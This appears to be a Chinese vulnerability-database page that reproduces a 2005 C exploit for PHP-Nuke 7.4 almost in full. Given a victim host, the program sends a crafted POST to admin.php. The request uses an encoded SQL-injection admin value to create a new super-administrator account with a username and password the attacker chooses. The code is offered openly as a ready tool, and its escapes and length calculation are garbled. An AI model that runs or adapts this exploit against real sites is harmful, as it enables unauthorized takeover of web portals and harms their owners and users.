PHP-Nuke 7.4 – Admin
漏洞ID | 1054895 | 漏洞类型 | |
发布时间 | 2005-02-09 | 更新时间 | 2005-02-09 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* old exploit but what pretty code /str0ke
*/
/****************************************************
* *
* phpNUKE v7.4 exploit *
* *
* this exploit create new admin with relative *
* passwd that you specified on parameter of exploit *
* you take administrative control of the webPortal *
* *
* Reverences: http://www.osvdb.org/9563 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 07/02/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron.group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of web server
void info(void);
void sendxpl(FILE *out, char *argv[]);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn;
struct sockaddr_in addr;
struct hostent *hp;
if(argc!=5)
info();
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();
system("clear");
printf("[*] Creating socket [OK]n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);
printf("[*] Connecting at victim host [OK]n");
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out,argv);
printf("[*] Now check your username and passwordn"
" on http://%s%snn",argv[1],argv[2]);
shutdown(sockconn,2);
close(sockconn);
return 0;
}
void info(void){
system("clear");
printf("#########################################n"
"# phpNUKE v7.4 exploit #n"
"#########################################n"
"# this exploit create an admin with #n"
"# the relative password, for your fun. #n"
"# exploit coded by Silentium #n"
"# Anacron Group Italy #n"
"# www.autistici.org/anacron-group-italy #n"
"#########################################nn"
"[Use]nn"
" silePNUKExpl <victim_host> <path_adminpage> <username> <password>nn"
"[example]nn"
" silePNUKExpl www.victim.com /admin.php sile silePassnn");
exit(1);
}
void sendxpl(FILE *out, char *argv[]){
int size = 145;
size+=sizeof(argv[3]);
size+=sizeof(argv[4]);
fprintf(out,"POST %s HTTP/1.0n"
"Connection: Keep-Aliven"
"Pragma: no-cachen"
"Cache-control: no-cachen"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identityn"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5n"
"Accept-Language: enn"
"Host: %sn"
"Content-Type: application/x-www-form-urlencodedn"
"Content-Length: %dnn"
"add_aid=%s&add_name=morte&add_pwd=%s&add_email=email%%40mail.com&admin="
"eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit="
"Create+Adminnn",argv[2],argv[1],size,argv[3],argv[4]);
printf("[*] Sending exploit [OK]nn");
}
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]nn");
exit(1);
}
void errgeth(void){
printf("[x] Resolving victim host [FAILED]nn");
exit(1);
}
void errconn(char *argv[]){
printf("[x] Connecting at victim host [FAILED]nn",argv[1]);
exit(1);
}
// milw0rm.com [2005-02-09]
相关推荐: Apple MacOS X ASN.1 Decoding Unspecified Remote Denial Of Service Vulnerability
Apple MacOS X ASN.1 Decoding Unspecified Remote Denial Of Service Vulnerability 漏洞ID 1099074 漏洞类型 Failure to Handle Exceptional Co…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666